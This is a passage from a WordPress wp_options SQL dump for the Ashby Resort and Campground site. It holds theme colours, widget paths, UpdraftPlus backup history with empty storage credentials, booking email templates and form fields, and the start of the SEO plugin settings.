50;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:276;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:276;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:402;i:1;i:0;i:2;i:1;}}}}}','no'),(470,'theme_mods_vantage-child','a:23:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:17:\"version_activated\";s:5:\"2.4.4\";s:23:\"vantage_menu_background\";s:7:\"#b7332a\";s:17:\"vantage_menu_text\";s:7:\"#ffffff\";s:30:\"vantage_menu_second_background\";s:7:\"#ffffff\";s:24:\"vantage_menu_second_text\";s:7:\"#b7332a\";s:25:\"vantage_menu_current_text\";s:7:\"#b7332a\";s:19:\"vantage_menu_search\";s:7:\"#b7332a\";s:24:\"vantage_menu_search_icon\";s:7:\"#ffffff\";s:30:\"vantage_menu_search_icon_hover\";s:7:\"#ffffff\";s:30:\"vantage_fonts_page_title_color\";s:7:\"#b7332a\";s:38:\"vantage_page_masthead_background_image\";s:66:\"http://ashbyresort.com/wp-content/uploads/2016/03/water2Header.jpg\";s:23:\"vantage_menu_icon_color\";s:7:\"#b7332a\";s:31:\"vantage_menu_current_background\";s:7:\"#ffffff\";s:25:\"vantage_menu_search_input\";s:7:\"#ffffff\";s:30:\"vantage_menu_search_input_text\";s:7:\"#1e73be\";s:27:\"_theme_settings_current_tab\";i:0;s:30:\"vantage_widgets_circle_icon_bg\";s:7:\"#dd3333\";s:18:\"custom_css_post_id\";i:-1;s:26:\"theme_settings_home_slider\";s:7:\"meta:17\";s:14:\"custom_css_key\";b:0;s:34:\"theme_settings_home_slider_stretch\";b:1;}','yes'),(511,'widget_sow-button','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(512,'widget_sow-google-map','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(513,'widget_sow-image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(514,'widget_sow-slider','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(515,'widget_sow-post-carousel','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(516,'widget_sow-editor','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(517,'siteorigin_widget_bundle_version','1.17.8','yes'),(518,'siteorigin_widgets_old_widgets','/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/accordion/accordion.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/button/button.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/cta/cta.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/contact/contact.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/editor/editor.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/features/features.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/google-map/google-map.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/headline/headline.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/hero/hero.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/icon/icon.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/image/image.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/image-grid/image-grid.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/slider/slider.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/layout-slider/layout-slider.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/post-carousel/post-carousel.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/price-table/price-table.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/simple-masonry.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/social-media-buttons.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/tabs/tabs.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/taxonomy/taxonomy.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/testimonial/testimonial.php,/home/expcom5/public_html/ashbyresort.com/wp-content/plugins/so-widgets-bundle/widgets/video/video.php','yes'),(600,'db_upgraded','','yes'),(603,'siteorigin_widgets_new_widgets','a:0:{}','yes'),(613,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:14:\"dbc@expcom.com\";s:7:\"version\";s:5:\"5.4.2\";s:9:\"timestamp\";i:1592263350;}','no'),(708,'updraftplus-addons_siteid','fc8368446ae1092c40dd71b9f4e5c4c2','yes'),(709,'updraft_retain_extrarules','a:0:{}','yes'),(710,'updraft_email','','yes'),(711,'updraft_report_warningsonly','a:0:{}','yes'),(712,'updraft_report_wholebackup','a:0:{}','yes'),(713,'updraft_extradbs','a:0:{}','yes'),(714,'updraft_include_more_path','a:0:{}','yes'),(715,'updraft_interval','daily','yes'),(716,'updraft_retain','3','yes'),(719,'updraft_interval_database','daily','yes'),(720,'updraft_retain_db','3','yes'),(721,'updraft_s3','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-bdfc2076106693db9ea54940acc0f1e1\";a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(722,'updraft_cloudfiles','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-f20e0dbeba1ebf65eecfe860edbaef9b\";a:5:{s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"region\";s:3:\"DFW\";s:4:\"user\";s:0:\"\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(723,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-21c5709d032a1af7c010abc5f8174615\";a:3:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:11:\"UpdraftPlus\";}}}','yes'),(724,'updraft_ftp','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-36861d6489b2e91f7a2fc56beb4ca7b8\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";s:1:\"1\";}}}','yes'),(725,'updraft_s3generic','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-355e6cfc3005764d913df6c763660cac\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:0:\"\";}}}','yes'),(726,'updraft_openstack','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-1e1b926b08a336e9f865cc361940ae86\";a:6:{s:7:\"authurl\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:6:\"region\";s:0:\"\";s:4:\"user\";s:0:\"\";s:8:\"password\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(727,'updraft_dreamobjects','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-68a0071eba70af01f1d214a47a2cea12\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:26:\"objects-us-west-1.dream.io\";}}}','yes'),(728,'updraft_include_plugins','1','yes'),(729,'updraft_include_themes','1','yes'),(730,'updraft_include_uploads','1','yes'),(731,'updraft_include_uploads_exclude','backup*,*backups,backwpup*,wp-clone','yes'),(732,'updraft_include_others','1','yes'),(733,'updraft_include_others_exclude','upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log','yes'),(734,'updraft_split_every','400','yes'),(735,'updraft_delete_local','1','yes'),(736,'updraft_dir','updraft','yes'),(737,'updraft_service','','yes'),(738,'updraft_debug_mode','0','yes'),(739,'updraft_ssl_useservercerts','0','yes'),(740,'updraft_ssl_disableverify','0','yes'),(741,'updraft_ssl_nossl','0','yes'),(743,'updraft_lastmessage','The backup apparently succeeded and is now complete (Oct 30 13:24:53)','yes'),(744,'updraftplus_unlocked_fd','1','yes'),(745,'updraftplus_last_lock_time_fd','2020-10-30 18:20:16','yes'),(746,'updraftplus_semaphore_fd','0','yes'),(747,'updraft_last_scheduled_fd','1604082016','yes'),(749,'updraft_backup_history','a:3:{i:1604082016;a:19:{s:7:\"plugins\";a:1:{i:0;s:75:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-plugins.zip\";}s:12:\"plugins-size\";i:56611440;s:6:\"themes\";a:1:{i:0;s:74:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-themes.zip\";}s:11:\"themes-size\";i:10961935;s:7:\"uploads\";a:1:{i:0;s:75:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-uploads.zip\";}s:12:\"uploads-size\";i:286827930;s:6:\"others\";a:1:{i:0;s:74:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-others.zip\";}s:11:\"others-size\";i:2560623;s:2:\"db\";s:69:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-db.gz\";s:7:\"db-size\";i:1897721;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"0870ec38b7e87448f48f079084053e08fd28daef\";s:7:\"themes0\";s:40:\"d2c13ee3da64b52a62e18bdcd8446287ab93f71f\";s:8:\"uploads0\";s:40:\"dc41f2cc6b3d86299db8a54c12a4607a6ed287fb\";s:7:\"others0\";s:40:\"e7bd3fbb41c9b7792b22427bb237fbbcf89e39e6\";s:3:\"db0\";s:40:\"8f70ad6d3a92dfda13029a7d7931ab8cc014beb8\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"ebba87ca788f672bd533ade4db0ff470898d1d2c18e48ae7930b96506a1e6cf5\";s:7:\"themes0\";s:64:\"efdeca880242b6798f160e728f7274a8663fdfec6da9083d5e0c6c2034b8ccea\";s:8:\"uploads0\";s:64:\"6defa9d460b1a3eb374d8d1514e5d699fd73bcc6dbdfc6143935f9a7953ce5bf\";s:7:\"others0\";s:64:\"528262384d9ade83860f5916531f090f918ebf61e1e699fbc2fd2de988fe4359\";s:3:\"db0\";s:64:\"03d32da59e55dc55b5c9472a5a23d6d5d4cc5dae20af4f99b9aedc72c08a2195\";}}s:5:\"nonce\";s:12:\"3431d600ea9b\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1604082017;s:6:\"themes\";i:1604082060;s:7:\"uploads\";i:1604082062;s:6:\"others\";i:1604082287;}s:18:\"created_by_version\";s:7:\"1.16.33\";s:21:\"last_saved_by_version\";s:7:\"1.16.33\";s:12:\"is_multisite\";b:0;}i:1602338311;a:19:{s:7:\"plugins\";a:1:{i:0;s:75:\"backup_2020-10-10-0858_Ashby_Resort_and_Campground_31ab5a4f026e-plugins.zip\";}s:12:\"plugins-size\";i:55137251;s:6:\"themes\";a:1:{i:0;s:74:\"backup_2020-10-10-0858_Ashby_Resort_and_Campground_31ab5a4f026e-themes.zip\";}s:11:\"themes-size\";i:10961935;s:7:\"uploads\";a:1:{i:0;s:75:\"backup_2020-10-10-0858_Ashby_Resort_and_Campground_31ab5a4f026e-uploads.zip\";}s:12:\"uploads-size\";i:286827930;s:6:\"others\";a:1:{i:0;s:74:\"backup_2020-10-10-0858_Ashby_Resort_and_Campground_31ab5a4f026e-others.zip\";}s:11:\"others-size\";i:2488620;s:2:\"db\";s:69:\"backup_2020-10-10-0858_Ashby_Resort_and_Campground_31ab5a4f026e-db.gz\";s:7:\"db-size\";i:1926621;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"3b8d23278ccaf0369275ead6a1645c4e3f91d081\";s:7:\"themes0\";s:40:\"f3218a9e8f125ab3a9dcf5aaa75b292d4240fdbd\";s:8:\"uploads0\";s:40:\"e1944262a5d0caed65ea760bb8d1ac37244ff442\";s:7:\"others0\";s:40:\"2a727512c51823e469bd976bb20c80562cc93720\";s:3:\"db0\";s:40:\"29fb1bb6ff559507854e5cda5d51ae4cf7e91bbb\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"ba16d812f9fbf2c1e20e4d3e2dd679bc822c025d1241e95d73ce17d041b2597c\";s:7:\"themes0\";s:64:\"c6b16639e08a832cf2ca57a70e1261aef2ad1973c90bc6a9d52e68d3bbffe70c\";s:8:\"uploads0\";s:64:\"8dc870ce1c38bac04749d31633f058e422116b4ee6dbe991607297fe76f6c9b2\";s:7:\"others0\";s:64:\"b91c1e2d65d6f524f2c3f5251d18adc7ff13088f156b178c4b80d96b9d4d6c1e\";s:3:\"db0\";s:64:\"97423f35a596ce481ccb6fcf9903107abb4359efb2ae905303e0a8aaba71d6c7\";}}s:5:\"nonce\";s:12:\"31ab5a4f026e\";s:7:\"service\";a:1:{i:0;s:4:\"none\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1602338311;s:6:\"themes\";i:1602338352;s:7:\"uploads\";i:1602338354;s:6:\"others\";i:1602338584;}s:18:\"created_by_version\";s:7:\"1.16.29\";s:21:\"last_saved_by_version\";s:7:\"1.16.29\";s:12:\"is_multisite\";b:0;}i:1599096915;a:19:{s:7:\"plugins\";a:1:{i:0;s:75:\"backup_2020-09-02-2035_Ashby_Resort_and_Campground_2c4ea45ed0df-plugins.zip\";}s:12:\"plugins-size\";i:55068663;s:6:\"themes\";a:1:{i:0;s:74:\"backup_2020-09-02-2035_Ashby_Resort_and_Campground_2c4ea45ed0df-themes.zip\";}s:11:\"themes-size\";i:10961935;s:7:\"uploads\";a:1:{i:0;s:75:\"backup_2020-09-02-2035_Ashby_Resort_and_Campground_2c4ea45ed0df-uploads.zip\";}s:12:\"uploads-size\";i:286827770;s:6:\"others\";a:1:{i:0;s:74:\"backup_2020-09-02-2035_Ashby_Resort_and_Campground_2c4ea45ed0df-others.zip\";}s:11:\"others-size\";i:2476996;s:2:\"db\";s:69:\"backup_2020-09-02-2035_Ashby_Resort_and_Campground_2c4ea45ed0df-db.gz\";s:7:\"db-size\";i:1897417;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"4a22ac3ad4a178e7c94e15df2aedfdb3add7a713\";s:7:\"themes0\";s:40:\"174bcb60bbea5b2b11977fc19b1c7719b2b2e405\";s:8:\"uploads0\";s:40:\"077a3828704ac1224cba234465827c664cd184c5\";s:7:\"others0\";s:40:\"409cd1ffa8a167173010ad05f791c85db684260b\";s:3:\"db0\";s:40:\"9ab5c79c1977cbbf120003849dada9ce823664d1\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"965c4a8122e3ec3c38f8805e48ca63905b80cde38cf420eb28c34f6b31098d5e\";s:7:\"themes0\";s:64:\"6c5d5b675e96b915a52e1731a79824f1528b77ef3f4f0f447caee3bd46b4e676\";s:8:\"uploads0\";s:64:\"d2266d9a3eef77a5d49e97de66d2734b8043d09ec1554645e826443441ec0c2e\";s:7:\"others0\";s:64:\"1e58b7a1039be4f11bd3e69a0e10266f62b2ea1b2e6ea0c52275878bd2876564\";s:3:\"db0\";s:64:\"a6531c96bffb819f4032d04525d01f746179f744cd16a2d541a414e6e0984bf6\";}}s:5:\"nonce\";s:12:\"2c4ea45ed0df\";s:7:\"service\";a:1:{i:0;s:4:\"none\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1599096915;s:6:\"themes\";i:1599096954;s:7:\"uploads\";i:1599096955;s:6:\"others\";i:1599097167;}s:18:\"created_by_version\";s:7:\"1.16.28\";s:21:\"last_saved_by_version\";s:7:\"1.16.28\";s:12:\"is_multisite\";b:0;}}','no'),(750,'updraft_last_backup','a:6:{s:11:\"backup_time\";i:1604082016;s:12:\"backup_array\";a:11:{s:7:\"plugins\";a:1:{i:0;s:75:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-plugins.zip\";}s:12:\"plugins-size\";i:56611440;s:6:\"themes\";a:1:{i:0;s:74:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-themes.zip\";}s:11:\"themes-size\";i:10961935;s:7:\"uploads\";a:1:{i:0;s:75:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-uploads.zip\";}s:12:\"uploads-size\";i:286827930;s:6:\"others\";a:1:{i:0;s:74:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-others.zip\";}s:11:\"others-size\";i:2560623;s:2:\"db\";s:69:\"backup_2020-10-30-1320_Ashby_Resort_and_Campground_3431d600ea9b-db.gz\";s:7:\"db-size\";i:1897721;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"0870ec38b7e87448f48f079084053e08fd28daef\";s:7:\"themes0\";s:40:\"d2c13ee3da64b52a62e18bdcd8446287ab93f71f\";s:8:\"uploads0\";s:40:\"dc41f2cc6b3d86299db8a54c12a4607a6ed287fb\";s:7:\"others0\";s:40:\"e7bd3fbb41c9b7792b22427bb237fbbcf89e39e6\";s:3:\"db0\";s:40:\"8f70ad6d3a92dfda13029a7d7931ab8cc014beb8\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"ebba87ca788f672bd533ade4db0ff470898d1d2c18e48ae7930b96506a1e6cf5\";s:7:\"themes0\";s:64:\"efdeca880242b6798f160e728f7274a8663fdfec6da9083d5e0c6c2034b8ccea\";s:8:\"uploads0\";s:64:\"6defa9d460b1a3eb374d8d1514e5d699fd73bcc6dbdfc6143935f9a7953ce5bf\";s:7:\"others0\";s:64:\"528262384d9ade83860f5916531f090f918ebf61e1e699fbc2fd2de988fe4359\";s:3:\"db0\";s:64:\"03d32da59e55dc55b5c9472a5a23d6d5d4cc5dae20af4f99b9aedc72c08a2195\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"3431d600ea9b\";s:26:\"nonincremental_backup_time\";i:1604082016;}','yes'),(752,'updraftplus_unlocked_','1','yes'),(753,'updraftplus_last_lock_time_','2016-06-18 01:26:27','yes'),(754,'updraftplus_semaphore_','0','yes'),(1171,'cfm_settings','a:3:{s:10:\"public_key\";s:0:\"\";s:11:\"private_key\";s:0:\"\";s:7:\"map_key\";s:0:\"\";}','yes'),(1218,'booking_num_per_page','10','yes'),(1219,'booking_listing_default_view_mode','vm_calendar','yes'),(1220,'booking_menu_position','top','yes'),(1221,'booking_email_new_admin','a:15:{s:7:\"enabled\";s:2:\"On\";s:2:\"to\";s:24:\"theashbyresort@gmail.com\";s:7:\"to_name\";s:21:\"Online Booking system\";s:4:\"from\";s:14:\"dbc@expcom.com\";s:9:\"from_name\";s:0:\"\";s:7:\"subject\";s:11:\"New booking\";s:7:\"content\";s:337:\"<p>You need to approve a new booking [bookingtype] for: [dates]&lt;br/&gt;&lt;br/&gt; Person detail information:&lt;br/&gt; [content]&lt;br/&gt;&lt;br/&gt; Currently a new booking is waiting for approval. Please visit the moderation panel [moderatelink]&lt;br/&gt;&lt;br/&gt;Thank you, Ashby Resort and Campground&lt;br/&gt;[siteurl]</p>\";s:14:\"header_content\";s:0:\"\";s:14:\"footer_content\";s:0:\"\";s:13:\"template_file\";s:5:\"plain\";s:10:\"base_color\";s:7:\"#557da1\";s:16:\"background_color\";s:7:\"#f5f5f5\";s:10:\"body_color\";s:7:\"#fdfdfd\";s:10:\"text_color\";s:7:\"#505050\";s:18:\"email_content_type\";s:4:\"html\";}','yes'),(1222,'booking_email_new_visitor','a:13:{s:7:\"enabled\";s:3:\"Off\";s:4:\"from\";s:14:\"dbc@expcom.com\";s:9:\"from_name\";s:14:\"Booking system\";s:7:\"subject\";s:11:\"New booking\";s:7:\"content\";s:211:\"Your reservation [bookingtype] for: [dates] is processing now! We will send confirmation by email. &lt;br/&gt;&lt;br/&gt;[content]&lt;br/&gt;&lt;br/&gt; Thank you, Ashby Resort and Campground&lt;br/&gt;[siteurl]\";s:14:\"header_content\";s:0:\"\";s:14:\"footer_content\";s:0:\"\";s:13:\"template_file\";s:5:\"plain\";s:10:\"base_color\";s:7:\"#557da1\";s:16:\"background_color\";s:7:\"#f5f5f5\";s:10:\"body_color\";s:7:\"#fdfdfd\";s:10:\"text_color\";s:7:\"#505050\";s:18:\"email_content_type\";s:4:\"html\";}','yes'),(1223,'booking_email_approved','a:14:{s:7:\"enabled\";s:2:\"On\";s:13:\"copy_to_admin\";s:3:\"Off\";s:4:\"from\";s:14:\"dbc@expcom.com\";s:9:\"from_name\";s:14:\"Booking system\";s:7:\"subject\";s:30:\"Your booking has been approved\";s:7:\"content\";s:169:\"Your booking [bookingtype] for: [dates] has been approved.&lt;br/&gt;&lt;br/&gt;[content]&lt;br/&gt;&lt;br/&gt;Thank you, Ashby Resort and Campground&lt;br/&gt;[siteurl]\";s:14:\"header_content\";s:0:\"\";s:14:\"footer_content\";s:0:\"\";s:13:\"template_file\";s:5:\"plain\";s:10:\"base_color\";s:7:\"#557da1\";s:16:\"background_color\";s:7:\"#f5f5f5\";s:10:\"body_color\";s:7:\"#fdfdfd\";s:10:\"text_color\";s:7:\"#505050\";s:18:\"email_content_type\";s:4:\"html\";}','yes'),(1224,'booking_email_deleted','a:14:{s:7:\"enabled\";s:2:\"On\";s:13:\"copy_to_admin\";s:3:\"Off\";s:4:\"from\";s:14:\"dbc@expcom.com\";s:9:\"from_name\";s:14:\"Booking system\";s:7:\"subject\";s:30:\"Your booking has been declined\";s:7:\"content\";s:194:\"Your booking [bookingtype] for: [dates] has been  canceled. &lt;br/&gt;[denyreason]&lt;br/&gt;&lt;br/&gt;[content]&lt;br/&gt;&lt;br/&gt;Thank you, Ashby Resort and Campground&lt;br/&gt;[siteurl]\";s:14:\"header_content\";s:0:\"\";s:14:\"footer_content\";s:0:\"\";s:13:\"template_file\";s:5:\"plain\";s:10:\"base_color\";s:7:\"#557da1\";s:16:\"background_color\";s:7:\"#f5f5f5\";s:10:\"body_color\";s:7:\"#fdfdfd\";s:10:\"text_color\";s:7:\"#505050\";s:18:\"email_content_type\";s:4:\"html\";}','yes'),(1225,'booking_email_deny','a:14:{s:7:\"enabled\";s:2:\"On\";s:13:\"copy_to_admin\";s:3:\"Off\";s:4:\"from\";s:14:\"dbc@expcom.com\";s:9:\"from_name\";s:14:\"Booking system\";s:7:\"subject\";s:30:\"Your booking has been declined\";s:7:\"content\";s:194:\"Your booking [bookingtype] for: [dates] has been  canceled. &lt;br/&gt;[denyreason]&lt;br/&gt;&lt;br/&gt;[content]&lt;br/&gt;&lt;br/&gt;Thank you, Ashby Resort and Campground&lt;br/&gt;[siteurl]\";s:14:\"header_content\";s:0:\"\";s:14:\"footer_content\";s:0:\"\";s:13:\"template_file\";s:5:\"plain\";s:10:\"base_color\";s:7:\"#557da1\";s:16:\"background_color\";s:7:\"#f5f5f5\";s:10:\"body_color\";s:7:\"#fdfdfd\";s:10:\"text_color\";s:7:\"#505050\";s:18:\"email_content_type\";s:4:\"html\";}','yes'),(1226,'booking_email_trash','a:14:{s:7:\"enabled\";s:2:\"On\";s:13:\"copy_to_admin\";s:3:\"Off\";s:4:\"from\";s:14:\"dbc@expcom.com\";s:9:\"from_name\";s:14:\"Booking system\";s:7:\"subject\";s:30:\"Your booking has been declined\";s:7:\"content\";s:194:\"Your booking [bookingtype] for: [dates] has been  canceled. &lt;br/&gt;[denyreason]&lt;br/&gt;&lt;br/&gt;[content]&lt;br/&gt;&lt;br/&gt;Thank you, Ashby Resort and Campground&lt;br/&gt;[siteurl]\";s:14:\"header_content\";s:0:\"\";s:14:\"footer_content\";s:0:\"\";s:13:\"template_file\";s:5:\"plain\";s:10:\"base_color\";s:7:\"#557da1\";s:16:\"background_color\";s:7:\"#f5f5f5\";s:10:\"body_color\";s:7:\"#fdfdfd\";s:10:\"text_color\";s:7:\"#505050\";s:18:\"email_content_type\";s:4:\"html\";}','yes'),(1227,'booking_form','[calendar]\n<div class=\"standard-form\">\n     <p>First Name*:<br />[text* name]</p>\n     <p>Last Name*:<br />[text* secondname]</p>\n     <p>Email*:<br />[email* email]</p>\n     <p>Phone:<br />[text phone]</p>\n     <p>Details:<br />[textarea details]</p>\n     <p>[captcha]</p>\n     <p>[submit class:btn \"Send\"]</p>\n</div>\n','yes'),(1228,'booking_form_show','<div style=\"text-align:left;word-wrap: break-word;\">\n  <strong>First Name</strong>: <span class=\"fieldvalue\">[name]</span><br/>\n  <strong>Last Name</strong>: <span class=\"fieldvalue\">[secondname]</span><br/>\n  <strong>Email</strong>: <span class=\"fieldvalue\">[email]</span><br/>\n  <strong>Phone</strong>: <span class=\"fieldvalue\">[phone]</span><br/>\n  <strong>Details</strong>: <span class=\"fieldvalue\">[details]</span><br/>\n</div>','yes'),(1229,'booking_form_visual','a:9:{i:0;a:2:{s:4:\"type\";s:8:\"calendar\";s:10:\"obligatory\";s:2:\"On\";}i:1;a:6:{s:4:\"type\";s:4:\"text\";s:4:\"name\";s:4:\"name\";s:10:\"obligatory\";s:3:\"Off\";s:6:\"active\";s:2:\"On\";s:8:\"required\";s:2:\"On\";s:5:\"label\";s:10:\"First Name\";}i:2;a:6:{s:4:\"type\";s:4:\"text\";s:4:\"name\";s:10:\"secondname\";s:10:\"obligatory\";s:3:\"Off\";s:6:\"active\";s:2:\"On\";s:8:\"required\";s:2:\"On\";s:5:\"label\";s:9:\"Last Name\";}i:3;a:6:{s:4:\"type\";s:5:\"email\";s:4:\"name\";s:5:\"email\";s:10:\"obligatory\";s:2:\"On\";s:6:\"active\";s:2:\"On\";s:8:\"required\";s:2:\"On\";s:5:\"label\";s:5:\"Email\";}i:4;a:7:{s:4:\"type\";s:6:\"select\";s:4:\"name\";s:8:\"visitors\";s:10:\"obligatory\";s:3:\"Off\";s:6:\"active\";s:3:\"Off\";s:8:\"required\";s:3:\"Off\";s:5:\"label\";s:8:\"Visitors\";s:5:\"value\";s:7:\"1\n2\n3\n4\";}i:5;a:6:{s:4:\"type\";s:4:\"text\";s:4:\"name\";s:5:\"phone\";s:10:\"obligatory\";s:3:\"Off\";s:6:\"active\";s:2:\"On\";s:8:\"required\";s:3:\"Off\";s:5:\"label\";s:5:\"Phone\";}i:6;a:6:{s:4:\"type\";s:8:\"textarea\";s:4:\"name\";s:7:\"details\";s:10:\"obligatory\";s:3:\"Off\";s:6:\"active\";s:2:\"On\";s:8:\"required\";s:3:\"Off\";s:5:\"label\";s:7:\"Details\";}i:7;a:6:{s:4:\"type\";s:7:\"captcha\";s:4:\"name\";s:7:\"captcha\";s:10:\"obligatory\";s:2:\"On\";s:6:\"active\";s:3:\"Off\";s:8:\"required\";s:2:\"On\";s:5:\"label\";s:0:\"\";}i:8;a:6:{s:4:\"type\";s:6:\"submit\";s:4:\"name\";s:6:\"submit\";s:10:\"obligatory\";s:2:\"On\";s:6:\"active\";s:2:\"On\";s:8:\"required\";s:2:\"On\";s:5:\"label\";s:4:\"Send\";}}','yes'),(1243,'wpseo','a:38:{s:8:\"tracking\";b:0;s:22:\"license_server_version\";s:1:\"2\";s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:18:\"indexation_started\";b:0;s:15:\"indexing_reason\";s:23:\"home_url_option_changed\";s:31:\"indexables_indexation_completed\";b:0;s:7:\"version\";s:4:\"15.2\";s:16:\"previous_version\";s:4:\"15.0\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\"